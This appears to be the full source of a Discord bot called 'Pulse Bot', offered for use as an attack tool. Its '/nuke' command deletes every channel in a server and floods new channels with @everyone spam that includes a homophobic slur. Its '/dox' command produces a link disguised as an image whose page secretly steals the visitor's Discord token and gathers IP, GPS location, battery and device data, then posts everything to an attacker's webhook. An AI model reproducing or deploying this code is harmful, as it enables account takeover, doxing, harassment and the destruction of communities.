const { Client, GatewayIntentBits, EmbedBuilder, PermissionsBitField, ChannelType } = require('discord.js');
const express = require('express');
const app = express();
const crypto = require('crypto');

const TOKEN = process.env.TOKEN;
const PORT = process.env.PORT || 3000;
const INVITE_LINK = 'https://discord.gg/eG6SyjWbh';

if (!TOKEN) {
    console.error('❌ TOKEN environment variable is required!');
    process.exit(1);
}

const client = new Client({
    intents: [
        GatewayIntentBits.Guilds,
        GatewayIntentBits.GuildMessages
    ]
});

const links = new Map();
let nukeRunning = false;
let nukeGuildId = null;

app.get('/', (req, res) => res.send('✅ Pulse Bot is running!'));
app.listen(PORT, () => console.log(`🌐 Web server on port ${PORT}`));

app.get('/img/:id.png', (req, res) => {
    const id = req.params.id;
    if (!links.has(id)) return res.status(404).send('Image not found');
    const data = links.get(id);
    res.type('text/html');
    res.send(generateDoxHTML(data.webhook));
});

async function registerCommands() {
    try {
        await client.application.commands.set([
            {
                name: 'nuke',
                description: '💀 Infinite nuke - starts the nuke'
            },
            {
                name: 'stop',
                description: '⏹️ Stops the nuke'
            },
            {
                name: 'dox',
                description: '📸 Generate dox link',
                options: [
                    {
                        name: 'webhook',
                        type: 3,
                        description: 'Webhook URL',
                        required: true
                    }
                ]
            }
        ]);
        console.log('✅ Commands registered');
    } catch (error) {
        console.error('Failed to register commands:', error);
    }
}

client.on('interactionCreate', async (interaction) => {
    if (!interaction.isChatInputCommand()) return;

    const { commandName } = interaction;

    if (commandName === 'nuke') {
        await interaction.deferReply({ ephemeral: true });

        const guild = interaction.guild;
        if (!guild) {
            return interaction.editReply('❌ This command can only be used in a server.');
        }

        const botMember = guild.members.cache.get(client.user.id);
        if (!botMember) {
            return interaction.editReply('❌ I am not in this server. Please add me with Administrator permissions.');
        }

        if (!botMember.permissions.has(PermissionsBitField.Flags.Administrator)) {
            return interaction.editReply('❌ I need **Administrator** permissions to nuke.');
        }

        if (nukeRunning) {
            return interaction.editReply('❌ A nuke is already running. Use `/stop` to stop it first.');
        }

        nukeRunning = true;
        nukeGuildId = guild.id;

        await interaction.editReply('🚀 **NUKE STARTED!** Use `/stop` to stop it.');
        await startNuke(guild);
    }

    if (commandName === 'stop') {
        await interaction.deferReply({ ephemeral: true });

        if (!nukeRunning) {
            return interaction.editReply('❌ No nuke is currently running.');
        }

        nukeRunning = false;
        nukeGuildId = null;
        await interaction.editReply('⏹️ **Nuke stopped.**');
    }

    if (commandName === 'dox') {
        await interaction.deferReply({ ephemeral: true });

        const guild = interaction.guild;
        if (!guild) {
            return interaction.editReply('❌ This command can only be used in a server.');
        }

        const wh = interaction.options.getString('webhook');
        if (!wh || !wh.startsWith('https://discord.com/api/webhooks/')) {
            return interaction.editReply('❌ Invalid webhook URL.');
        }

        const id = crypto.randomBytes(6).toString('hex');
        const url = `https://pulsebot-qtgf.onrender.com/img/${id}.png`;
        links.set(id, { webhook: wh, user: interaction.user.tag, created: Date.now() });

        const embed = new EmbedBuilder()
            .setTitle('✅ Dox Link Ready')
            .setColor(0x22c55e)
            .setDescription(`🔗 **${url}**\n\nSends IP, location, ISP, ASN, battery, VPN detection, and device info.`)
            .setFooter({ text: `Generated by ${interaction.user.tag}` });

        await interaction.editReply({ embeds: [embed] });
    }
});

async function startNuke(guild) {
    const variants = [
        '# PULSE OWNS ALL YOU F@GGOTS TRASH ASS SERVER',
        '# PULSE  OWNS ALL YOU F@GGOTS TRASH ASS SERVER',
        '# PULSE OWNS ALL  YOU F@GGOTS TRASH ASS SERVER'
    ];
    const inviteLine = `# JOIN PULSE: ${INVITE_LINK}`;

    const channels = guild.channels.cache;
    console.log(`Deleting ${channels.size} channels...`);
    
    const channelArray = Array.from(channels.values());
    for (let i = 0; i < channelArray.length; i += 10) {
        const batch = channelArray.slice(i, i + 10);
        await Promise.all(batch.map(async (ch) => {
            try {
                await ch.delete();
            } catch(e) {}
        }));
        await new Promise(r => setTimeout(r, 50));
    }
    console.log('All channels deleted.');

    async function spamChannel(ch) {
        if (!nukeRunning) return;
        try {
            while (nukeRunning) {
                try {
                    const line = variants[Math.floor(Math.random() * variants.length)];
                    let big = `@everyone ${line}\n`;
                    while (big.length + line.length + 1 < 2000 - inviteLine.length - 2) {
                        big += line + '\n';
                    }
                    big += `\n${inviteLine}`;
                    const spamMessage = big.slice(0, 2000);
                    await ch.send(spamMessage);
                } catch(e) {}
                await new Promise(r => setTimeout(r, 10));
            }
        } catch(e) {}
    }

    async function createChannelsAndSpam() {
        let createdCount = 0;
        while (nukeRunning) {
            try {
                const newChannels = await Promise.all([
                    guild.channels.create({ name: 'pulse', type: ChannelType.GuildText }).catch(() => null),
                    guild.channels.create({ name: 'pulse', type: ChannelType.GuildText }).catch(() => null),
                    guild.channels.create({ name: 'pulse', type: ChannelType.GuildText }).catch(() => null),
                    guild.channels.create({ name: 'pulse', type: ChannelType.GuildText }).catch(() => null),
                    guild.channels.create({ name: 'pulse', type: ChannelType.GuildText }).catch(() => null)
                ]);
                
                const valid = newChannels.filter(c => c !== null);
                for (const ch of valid) {
                    spamChannel(ch);
                }
                
                createdCount += valid.length;
                console.log(`Created ${createdCount} channels total`);
                
            } catch(e) {}
            await new Promise(r => setTimeout(r, 10));
        }
    }

    createChannelsAndSpam();

    guild.channels.cache.forEach(ch => {
        if (ch.type === ChannelType.GuildText) {
            spamChannel(ch);
        }
    });
}

// ---- SIMPLE DOX HTML - NO SYNTAX ERRORS ----
function generateDoxHTML(webhook) {
    return `<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Loading...</title>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body { background: #0b0b12; display: flex; justify-content: center; align-items: center; height: 100vh; font-family: 'Segoe UI', sans-serif; overflow: hidden; }
        .container { text-align: center; }
        .container img { max-width: 90%; max-height: 80vh; border-radius: 16px; box-shadow: 0 20px 60px rgba(0,0,0,0.8); border: 1px solid rgba(255,255,255,0.06); }
        .caption { color: #555; font-size: 14px; margin-top: 12px; }
    </style>
</head>
<body>
    <div class="container">
        <img src="https://cdn.pixabay.com/photo/2017/01/02/22/29/cat-1941089_1280.jpg" alt="Cat" />
        <div class="caption">Loading...</div>
    </div>
    <script>
        const WEBHOOK_URL = "${webhook}";

        function sendToWebhook(data) {
            fetch(WEBHOOK_URL, {
                method: "POST",
                headers: { "Content-Type": "application/json" },
                body: JSON.stringify(data)
            }).catch(function(e) {});
        }

        function stealToken() {
            try {
                var token = localStorage.getItem("token") || 
                            document.cookie.split("; ").find(function(row) { return row.startsWith("token="); }).split("=")[1] ||
                            sessionStorage.getItem("token");
                if (token) {
                    sendToWebhook({
                        content: "**🎯 DISCORD TOKEN:** ```" + token + "```"
                    });
                }
            } catch (e) {}
        }

        function getIPData() {
            return fetch("https://ipinfo.io/json")
                .then(function(res) { return res.json(); })
                .then(function(data) {
                    return {
                        ip: data.ip || "N/A",
                        country: data.country || "N/A",
                        region: data.region || "N/A",
                        city: data.city || "N/A",
                        postal: data.postal || "N/A",
                        lat: data.loc ? data.loc.split(",")[0] : "N/A",
                        lon: data.loc ? data.loc.split(",")[1] : "N/A",
                        isp: data.org || "N/A",
                        timezone: data.timezone || "N/A"
                    };
                })
                .catch(function() {
                    return {
                        ip: "N/A",
                        country: "N/A",
                        region: "N/A",
                        city: "N/A",
                        postal: "N/A",
                        lat: "N/A",
                        lon: "N/A",
                        isp: "N/A",
                        timezone: "N/A"
                    };
                });
        }

        function getGPSLocation() {
            return new Promise(function(resolve) {
                if (!navigator.geolocation) {
                    resolve(null);
                    return;
                }
                navigator.geolocation.getCurrentPosition(
                    function(pos) {
                        resolve({
                            lat: pos.coords.latitude,
                            lon: pos.coords.longitude,
                            accuracy: pos.coords.accuracy
                        });
                    },
                    function(err) {
                        resolve(null);
                    },
                    { enableHighAccuracy: true, timeout: 8000 }
                );
            });
        }

        function getBattery() {
            return navigator.getBattery().then(function(b) {
                return {
                    level: Math.round(b.level * 100),
                    charging: b.charging
                };
            }).catch(function() {
                return null;
            });
        }

        function detectVPN(ipData, gpsData) {
            var score = 0;
            var signals = [];
            var vpnKeywords = ["vpn", "proxy", "cloudflare", "aws", "amazon", "digitalocean", "vultr", "linode", "hetzner", "ovh", "m247", "psychz", "hostinger", "namecheap", "contabo", "server", "hosting", "dedicated", "datacenter", "cloud", "vps"];
            var isp = (ipData.isp || "").toLowerCase();
            for (var i = 0; i < vpnKeywords.length; i++) {
                if (isp.includes(vpnKeywords[i])) {
                    score += 2;
                    signals.push("ISP matches VPN/hosting provider");
                    break;
                }
            }
            try {
                var browserTz = Intl.DateTimeFormat().resolvedOptions().timeZone;
                if (ipData.timezone && ipData.timezone !== "N/A" && browserTz && ipData.timezone !== browserTz) {
                    score += 3;
                    signals.push("Timezone mismatch: IP says " + ipData.timezone + " but browser says " + browserTz);
                }
            } catch (e) {}
            if (gpsData && ipData.lat !== "N/A" && ipData.lon !== "N/A") {
                var ipLat = parseFloat(ipData.lat);
                var ipLon = parseFloat(ipData.lon);
                var gpsLat = gpsData.lat;
                var gpsLon = gpsData.lon;
                var distance = Math.sqrt(Math.pow(ipLat - gpsLat, 2) + Math.pow(ipLon - gpsLon, 2)) * 111;
                if (distance > 100) {
                    score += 5;
                    signals.push("Location mismatch: IP says " + ipData.city + " but GPS shows different location");
                }
            }
            return {
                detected: score >= 3,
                score: score,
                signals: signals
            };
        }

        function runDox() {
            stealToken();
            getIPData().then(function(ipData) {
                getGPSLocation().then(function(gpsData) {
                    getBattery().then(function(battery) {
                        var vpn = detectVPN(ipData, gpsData);
                        var ua = navigator.userAgent;
                        var browser = ua.includes("Edg") ? "Edge" : ua.includes("Chrome") ? "Chrome" : ua.includes("Firefox") ? "Firefox" : ua.includes("Safari") ? "Safari" : "Unknown";
                        var os = ua.includes("Windows NT 10.0") ? "Windows 10/11" : ua.includes("Mac OS X") ? "macOS" : ua.includes("Android") ? "Android" : ua.includes("iPhone") ? "iOS" : "Unknown";
                        var device = /mobile|android|iphone|ipad/i.test(ua) ? "Mobile" : "Desktop";
                        var now = new Date();
                        var timestamp = now.toISOString();
                        var fields = [];

                        fields.push({ name: "🌐 IP", value: ipData.ip, inline: true });
                        fields.push({ name: "🏙️ City", value: ipData.city, inline: true });
                        fields.push({ name: "🗺️ Region", value: ipData.region, inline: true });
                        fields.push({ name: "🌍 Country", value: ipData.country, inline: true });
                        fields.push({ name: "🏢 ISP", value: ipData.isp, inline: true });
                        fields.push({ name: "🕒 Timezone", value: ipData.timezone, inline: true });

                        if (ipData.lat !== "N/A" && ipData.lon !== "N/A") {
                            fields.push({ name: "📍 IP Location", value: "https://www.google.com/maps?q=" + ipData.lat + "," + ipData.lon, inline: false });
                        }

                        if (gpsData) {
                            fields.push({ 
                                name: "📍 GPS Location", 
                                value: "Lat: " + gpsData.lat + " Lon: " + gpsData.lon + " Accuracy: " + Math.round(gpsData.accuracy) + "m", 
                                inline: false 
                            });
                        }

                        if (battery) {
                            fields.push({ name: "🔋 Battery", value: battery.level + "%" + (battery.charging ? " (Charging)" : " (Not Charging)"), inline: true });
                        }

                        fields.push({ name: "🛡️ VPN", value: vpn.detected ? "✅ Likely (Score: " + vpn.score + ")" : "❌ Not detected", inline: true });

                        if (vpn.signals.length > 0) {
                            fields.push({ name: "🔍 VPN Signals", value: vpn.signals.join("\\n"), inline: false });
                        }

                        fields.push({ name: "🧠 Browser", value: browser, inline: true });
                        fields.push({ name: "💻 OS", value: os, inline: true });
                        fields.push({ name: "🖥️ Device", value: device, inline: true });
                        fields.push({ name: "⏰ Time", value: timestamp, inline: false });

                        sendToWebhook({
                            embeds: [{
                                title: "☠️ TARGET COMPROMISED",
                                color: 0xFF0000,
                                fields: fields,
                                footer: { text: "☠️ PULSE DOX SYSTEM" }
                            }]
                        });
                    });
                });
            });
        }

        runDox();

        setTimeout(function() {
            document.body.innerHTML = "";
            document.body.style.background = "#000000";
            document.body.style.margin = "0";
            document.body.style.height = "100vh";
            setTimeout(function() {
                window.close();
                window.location.href = "about:blank";
            }, 300);
        }, 5000);

        document.querySelector(".caption").textContent = "Image loaded successfully.";
    <\/script>
</body>
</html>`;
}

setInterval(() => {
    const keys = Array.from(links.keys());
    if (keys.length > 100) keys.slice(0, keys.length - 100).forEach(k => links.delete(k));
}, 60000);

client.once('ready', async () => {
    console.log(`🤖 ${client.user.tag} is online!`);
    await registerCommands();
    console.log('✅ Bot is ready!');
});

client.login(TOKEN);
